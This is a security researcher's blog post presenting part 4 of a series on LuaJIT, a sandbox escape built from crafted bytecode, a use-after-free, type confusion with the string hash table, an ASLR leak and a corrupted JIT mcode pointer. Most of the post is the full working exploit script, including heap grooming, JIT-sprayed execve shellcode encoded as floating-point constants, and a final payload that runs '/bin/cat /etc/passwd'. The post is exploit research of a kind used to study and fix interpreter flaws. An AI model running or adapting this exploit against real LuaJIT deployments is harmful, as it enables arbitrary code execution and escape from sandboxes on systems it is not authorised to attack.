Happy holidays 🕎/🎅 and (almost) happy new year! This week I presented my LuaJIT journey at the DEFCON-Groups meetup(@dc9723):

The slides included a summary of the 3-part blog series) I published in this blog. However, there was a 4th part I still didn’t publish here and was included in the presentation. So, here it is, part 4: Crafting a fully-weaponized sandbox escape for LuaJIT! :D

Side-Note: The talk was not recorded / I didn’t publish the slides(yet, sorry). However, this blogpost is a great summary of the entire talk + it documents some technical stuff in more depth.

Exploit plan

The plan is as follows:

  • JIT-Spray your shellcode(explained in part3 of this series).
  • Achieve Use-After-Free
  • Leverage the UAF to get a Type-Confusion
  • Get leaks: Defeat ASLR
  • Find GCtrace->mcode pointer, overwrite its value
  • Jump to shellcode

Let’s go!

Use-After-Free

By default, Lua(JIT) allows you to load already-compiled Lua bytecode. This bytecode is not verified as it is considered ‘trusted’, and you can cook alot of powerful primitives by loading a specially-crafted bytecode. Previously, this mechanism was researched by Samuel Groß(@5aelo, Project Zero) in this writeup. In his blogpost, Samuel demonstrates how to leverage the LOADK instruction of Lua to load a forged TValue. It involved (a bit odd) heap shaping which I found difficult to re-produce in LuaJIT. Plus, I wanted to come up with my own strategy/exploit, so I decided to go for a MOV exploit.

In order to achieve UAF with a MOV instruction we:

  1. Create a table (i.e: local tbl = {1337, 'foo', 'bar'})
  2. MOV its TValue outside the virtual stack frame
  3. Set it to nil to make the GCtab object un-reachable from the GC root
  4. call collectgarbage()

And now we have a TValue on the virtual stack, pointing to a free’d GCtab object.

The reason we get a UAF out of the steps above is the way the Garbage Collector decides to free memory: The LuaJIT’s GC(which is based on Lua 5.1) has a Tri-Color Mark-and-Sweep algorithm. Essentially, whenever the GC traverse through the objects and mark them as grey/black it scans through the virtual stack, starting from the bottom(lua_State::stack) all the way to the top of the stack(lua_State::top):

src/lj_gc.c#L293-L305

static void gc_traverse_thread(global_State *g, lua_State *th)
{
  TValue *o, *top = th->top;
  for (o = tvref(th->stack)+1+LJ_FR2; o < top; o++)
    gc_marktv(g, o); // <------ mark the object 
 
  /*...*/
}

Hence, if we MOV a TValue outside of the stack(above L->top) and call trigger the garbage collector(using collectgarbage()) the GCtab object pointed by this TValue will never get marked ➜ as a result, it will be free’d during the sweep phase.

What the Garbage Collector doesn’t know is that we have another copy of this TValue, waiting for us to move it back to our Lua context after the GC collection ends :) And that’s the logic behind how to achieve UAF with MOV.

At this point, the TValue is outside of the stack so we don’t have access to it in the context of our Lua script, but it shouldn’t be a problem to get it back to our script: we’ll just use RET <Our_TValue_idx>. This is exactly what exp-gen.py does when we prepare our exploit.

Type Confusion

The road to get a Type-Confusion was a bit difficult, and required some fancy engineering behind it as it was difficult to find the right structures/overlapping. But eventually I got it.

Before we get into the details, let’s set a goal: Our goal is to get a Lua table of type GCtab with a very large size(GCtab::asize) in order to get OOB r/w, and from there we’ll build our way up to a full code execution.

The data structures I chose to confuse are GCtab and the array of pointers pointed by global_State::strhash. But before we dive into this, we’ll need to know what global_State::strhash is used for and what exactly is String Interning.

Some Background on String Interning

LuaJIT implements String Interning:

In computer science, string interning is a method of storing only one copy of each distinct string value, which must be immutable. Interning strings makes some string processing tasks more time- or space-efficient at the cost of requiring more time when the string is created or interned. The distinct values are stored in a string intern pool. (Source: wikipedia)

In other words, LuaJIT maintains a hash-table pointed by global_State::strhash. This hash-table contains all of the string objects(GCstr) of a Lua program.

Every time a new string allocation request is made, a hash is calculated in order to determine whether this string has been already interned or not:

src/lj_str.c#L132-L151

GCstr *lj_str_new(lua_State *L, const char *str, size_t lenx)
{
  /* ... */
    /* Compute string hash. Constants taken from lookup3 hash by Bob Jenkins. */
  if (len >= 4) {  /* Caveat: unaligned access! */
    a = lj_getu32(str);
    h ^= lj_getu32(str+len-4);
    b = lj_getu32(str+(len>>1)-2);
    h ^= b; h -= lj_rol(b, 14);
    b += lj_getu32(str+(len>>2)-1);
  } else if (len > 0) {
    a = *(const uint8_t *)str;
    h ^= *(const uint8_t *)(str+len-1);
    b = *(const uint8_t *)(str+(len>>1));
    h ^= b; h -= lj_rol(b, 14);
  } else {
    return &g->strempty;
  }
  a ^= h; a -= lj_rol(h, 11);
  b ^= a; b -= lj_rol(a, 25);
  h ^= b; h -= lj_rol(b, 16);
  /* Check if the string has already been interned. */
  o = gcref(g->strhash[h & g->strmask]);
  if (LJ_LIKELY((((uintptr_t)str+len-1) & (LJ_PAGESIZE-1)) <= LJ_PAGESIZE-4)) {
    while (o != NULL) {
      GCstr *sx = gco2str(o);
      if (sx->len == len && str_fastcmp(str, strdata(sx), len) == 0) {
	/* Resurrect if dead. Can only happen with fixstring() (keywords). */
	if (isdead(g, o)) flipwhite(o);
	return sx;  /* Return existing string. */
      }
      o = gcnext(o);
    }
  }
  /* ... */
}

However, if the string is unique/not already exists in the hash-table, a new allocation will be made. The interesting part here is what’s happening after the allocation of the new GCstr object:

src/lj_str.c#L173-L190

  if (g->strnum++ > g->strmask)  /* Allow a 100% load factor. */
    lj_str_resize(L, (g->strmask<<1)+1);  /* Grow string table. */

If the string hash-table is too big, it will relocate. This part caught my attention, and led me to the creation of the final, successful Type-Confusion PoC(below)

Hash-table hacking

In order to create an overlap/type-confusion between the global_State::strhash hash-table and the UAF’d GCtab object we have to do the following steps:

And in order to populate the GCtab::asize field(which determine how big is the array/Lua table) we’ll need to occupy the 6th index of the global_State::strhash hash-table. To do that, I made a tiny C program that brute-forces possible options:

$ ./calc_hash
...
hash: 0x3ca5d406,  idx=0x6,  string=xmw
hash: 0xb3da6806,  idx=0x6,  string=osw
hash: 0x5fcb7806,  idx=0x6,  string=Gvx
...more results...

All we need is to add one of those strings as a constant in our exploit script, and during the hash-table relocation, it will fall right on the 6th index:

Nice! The 6th index is occupied, which makes the asize field to have a very large value:

+we have a Null-pointer dereference at the GCtab::array field. This means that we have a relative r/w primitive starting from address 0x0. But hey, wait, if we’re starting from 0x0 that’s not a relative r/w, that’s an arbitrary r/w! To put things more clear: It means that if we print(uaf_tbl[0x40000000]) the LuaJIT interpreter will print out the value stored in address 0x40000000!(multiplied by 8, but let’s not focus on that/that’s not an issue. We’ll just divide it by 8 to cancel the multiplication).

Defeating ASLR

I’ll just paste here a screenshot from the presentation, because it really explains everything in a simple way:

Note: here I chose to leak the address of the require() function, but you can do it on any other built-in function that has a GCfuncC object.

Find the mcode pointer

In order to find the GCtrace::mcode pointer on the heap, we’ll need to find the GG_State structure on the heap:

src/lj_dispatch.h#L89-L101

struct GG_State {
    lua_State L;
    global_State g; // g.allocf (function pointer to alloc function, lj_alloc_f)
    jit_State J;    // J.trace  (pointer to GCtrace’s array)
    // ...
}

This state object has a function pointer to lj_alloc_f at g.allocf, and couple of properties after it: it has the J.trace pointer, which points to an array that stores all of the GCtrace objects of our program(==JITed traces).

Using our leaks + arbitrary r/w primitive:

  • Calculate the address of lj_alloc_f
  • Scan through the heap in order to find this value
  • The moment we find it, it means we found g.allocf
  • Add a fixed offset of +0x308(it’s fixed because they are both part of the same GG_State structure) to reach the J.trace pointer.
  • Access our JITed trace object overwrite its mcode value win!
-- this will help us to leverage the heap hints/leaks to completly break ASLR 
local addrof = function(tval)
     local strhex = tostring(tval)
     local i = string.find(strhex, '0x')
     return tonumber(string.sub(strhex, i+2), 16)
end
 
-- get C func addr(lj_alloc_f) to break ASLR
local allocf_addr = get_c_func(rw_primitive) - 1.01738e-318 -- 0x32490 is the offset
print('[*] allocf @ ', string.format("0x%x",u64(allocf_addr)))
 
-- Searching for the `global_State` struct, in order to find the `jit_State` struct (neighbors, both are part of `GG_State`)  
local nloop = addrof(require)
print('[*] Finding global_State::allocf ptr... @ ',string.format("0x%x",nloop))
while (nloop>0) do
    if(rw_primitive[nloop/8] == allocf_addr) then
        break 
    end
    nloop = nloop-8
end 
 
-- Got it, now dereference jit_State->trace[] array
local gcref_arr = rw_primitive[(nloop+0x308-0x8)/8]
print('[*] GCRef array @ ', string.format("0x%x",u64(gcref_arr)))
 
local idx1, idx2 = u32(rw_primitive[(u64(gcref_arr)+0x10) /8]) -- grab the 4th index
 
-- Dereference again, in order to reach the `mcode` pointer
local gctrace = rw_primitive[(idx2+0x40) / 8]
print('[*] GCtrace->mcode @ ',string.format("0x%x",u64(gctrace)))
 
-- Corrupt it
rw_primitive[(idx2+0x40) / 8] = gctrace+9.14e-322 -- adding 0x40 to reach to the `mcode` ptr; incr the ptr to create mis-alignment
print('[*] JITed ptr corrupted! jumping to shellcode :^)\n')
 
-- profit! 
jitted(tbl,'/bin/cat','/etc/passwd')

Full exploit

Below is the full exploit:

https://github.com/0xbigshaq/luajit-pwn/blob/main/sandbox-escape/hax.lua

--[[
    This exploit is a sandbox escape for LuaJIT
    Download: https://luajit.org/download.html 
    Author: https://twitter.com/0x_shaq 
 
    Tested on:
     > ubuntu:20.04
     > LuaJIT compiled with default settings(just run `make`)
]]--
 
local uaf = function()
  -- heap grooming #1: Prepare the _string interning_ hash-table
    collectgarbage('collect')
    local dummy = 123 -- virtual stack 
    local spray = {}
      for i=0x30, (0x13c-18), 1 do
        spray[i] = string.rep('pewpew', i)
      end
    collectgarbage('collect')
 
    -- heap grooming #2: murder the allocator's `dv` chunk
      for i=(0x13c), (0x13c-1)+0x200, 1 do
        spray[i] = { 1.8457939563e-314, 1.8457939563e-314, 1.8457939563e-314 }
      end
    
    -- Achieve UAF primitive
    local freed = {
        2261634.5098039214,
        156842099844.51764,
        1.0843961455707782e+16,
        7.477080264543605e+20,
        5.142912663207646e+25,
    }
    local mov = freed   -- this `MOV` will be hot-patched with OOB by `exp-gen.py`
    freed = nil         -- Making the `GCtab` unreachable from the GC root
    collectgarbage('collect')
 
    -- Type Confusion!
    spray[0x30] = spray[0x30] .. 'another concat :D' -- Trigger a relocation of the global string hash table.
    return 1337         -- this `RET` will be hot-patched with OOB by `exp-gen.py`
                        -- Should return the value of the free'd `GCtab` object 
end
 
 
--[[ ======= exploit begins here ======= ]]--
hash_t = string.upper('Gvx') -- hash-table hacking
local rw_primitive = uaf()
print('[*] UAF + type confusion done :D')
 
-- preparing JIT-Spray
local jitted = function(t, s, a)
  for i=0, 100, 1 do
    t[5e-324]=0
    t[1e-323]=0
    t[1.5e-323]=0
    t[2e-323]=0
    t[2.5e-323]=0
    t[3e-323]=0
    t[1.9055771651032652e-193]=0 -- xor rdx, rdx
    t[1.8559668824708362e-193]=0 -- add rbp, 0x18
    t[1.8494619877878633e-193]=0 -- mov rsi, [rbp]
    t[1.8517288554178477e-193]=0 -- sub rsi,0x8
    t[1.914498447205438e-193]=0  -- mov rbx, rsi
    t[1.8639327969763123e-193]=0 -- mov esi, [esi]
    t[1.8538274887895865e-193]=0 -- add rsi,0x10
    t[1.8516839145637716e-193]=0 -- add rbx,0x8
    t[1.8567088159676176e-193]=0 -- mov ebx, [ebx]
    t[1.8538243533811626e-193]=0 -- add rbx,0x10
    t[1.849450512851345e-193]=0  -- push 0
    t[1.8716972807551464e-193]=0 -- push rbx
    t[1.872875119460234e-193]=0  -- mov rdi,rsi; push rdi
    t[1.8745776759605808e-193]=0 -- push rsp; pop rsi
    t[1.8493391391782406e-193]=0 -- mov eax, 59
    t[1.8506931797233557e-193]=0 -- syscall
    end
end
 
-- extra trace for padding purposes in the GCRef traces array
local tbl = {}
for i=0, 100, 1 do
  tbl[i]=i
end
 
-- JIT-Spraying shellcode
print('[*] Creating a hotloop')
jitted(tbl)
print('[*] Done, trace is ready!')
 
 
-- ================= <helper funcs> =================
-- this will help us to leverage the heap hints/leaks to completly break ASLR 
local addrof = function(tval)
     local strhex = tostring(tval)
     local i = string.find(strhex, '0x')
     return tonumber(string.sub(strhex, i+2), 16)
end
 
-- unpacking 64bit values (from a floating point double/IEEE-754 to Hex)
local u64 = function(num)
   local fixup = 2.3641409746639015e-308 -- 0x11000000000000
  num = num + fixup -- dirty hack, sorry
  local bytes = {0,0,0,0, 0,0,0,0}
 
  local anum = math.abs(num)
  local mantissa, exponent = math.frexp(anum)
  exponent = exponent - 1
  mantissa = mantissa * 2 - 1
 
  local sign = num ~= anum and 128 or 0
  
  exponent = exponent + 1023
  bytes[1] = sign + math.floor(exponent / 2^4)
 
  mantissa = mantissa * 2^4
  local currentmantissa = math.floor(mantissa)
  mantissa = mantissa - currentmantissa
 
  bytes[2] = (exponent % 2^4) * 2^4 + currentmantissa
  for i= 3, 8 do
    mantissa = mantissa * 2^8
    currentmantissa = math.floor(mantissa)
    mantissa = mantissa - currentmantissa
    bytes[i] = currentmantissa
end
 
  return tonumber(
      string.format('0x%02x%02x%02x%02x%02x%02x',
        --  bytes[1],  
        --  bytes[2],  
          bytes[3],  
          bytes[4],  
          bytes[5],  
          bytes[6],
          bytes[7],  
          bytes[8]
  ) ,16)
  end
 
  -- unpacking 32bit values (from a floating point double/IEEE-754 to Hex)
local u32 = function(num)
  local fixup = 2.3641409746639015e-308 -- 0x11000000000000
  num = num + fixup -- dirty hack, sorry
  local bytes = {0,0,0,0, 0,0,0,0}
 
  local anum = math.abs(num)
  local mantissa, exponent = math.frexp(anum)
  exponent = exponent - 1
  mantissa = mantissa * 2 - 1
 
  local sign = num ~= anum and 128 or 0
 
  exponent = exponent + 1023
  bytes[1] = sign + math.floor(exponent / 2^4)
 
  mantissa = mantissa * 2^4
  local currentmantissa = math.floor(mantissa)
  mantissa = mantissa - currentmantissa
 
  bytes[2] = (exponent % 2^4) * 2^4 + currentmantissa
  for i= 3, 8 do
    mantissa = mantissa * 2^8
    currentmantissa = math.floor(mantissa)
    mantissa = mantissa - currentmantissa
    bytes[i] = currentmantissa
  end
 
  return 0, tonumber(
      string.format('0x%02x%02x%02x%02x',
          bytes[5],  
          bytes[6],
          bytes[7],  
          bytes[8]
  ) ,16)
end
 
-- Fetch a function pointer from a `GCfunc` object
local get_c_func = function(rw)
    local fcn_ptr = rw[(addrof(require)+0x18)   / 0x8] -- GCfuncC->f
    return fcn_ptr
end
-- ================= </helper funcs> =================  
 
-- get C func addr(lj_alloc_f) to break ASLR
local allocf_addr = get_c_func(rw_primitive) - 1.01738e-318 -- 0x32490 is the offset
print('[*] allocf @ ', string.format("0x%x",u64(allocf_addr)))
 
-- Searching for the `global_State` struct, in order to find the `jit_State` struct (neighbors, both are part of `GG_State`)  
local nloop = addrof(require)
print('[*] Finding global_State::allocf ptr... @ ',string.format("0x%x",nloop))
while (nloop>0) do
    if(rw_primitive[nloop/8] == allocf_addr) then
        break 
    end
    nloop = nloop-8
end 
 
-- Got it, now dereference jit_State->trace[] array
local gcref_arr = rw_primitive[(nloop+0x308-0x8)/8]
print('[*] GCRef array @ ', string.format("0x%x",u64(gcref_arr)))
 
local idx1, idx2 = u32(rw_primitive[(u64(gcref_arr)+0x10) /8]) -- grab the 4th index
 
-- Dereference again, in order to reach the `mcode` pointer
local gctrace = rw_primitive[(idx2+0x40) / 8]
print('[*] GCtrace->mcode @ ',string.format("0x%x",u64(gctrace)))
 
-- Corrupt it
rw_primitive[(idx2+0x40) / 8] = gctrace+9.14e-322 -- adding 0x40 to reach to the `mcode` ptr; incr the ptr to create mis-alignment
print('[*] JITed ptr corrupted! jumping to shellcode :^)\n')
 
-- profit! 
jitted(tbl,'/bin/cat','/etc/passwd')

Result:

It was a great journey :D This is the 2nd time I researched about language interpreters internals(the 1st time was with a Zend Engine Research). At this point, I think I’m ready to face my all-time nemesis: Browsers! Stay tuned, and wish me luck.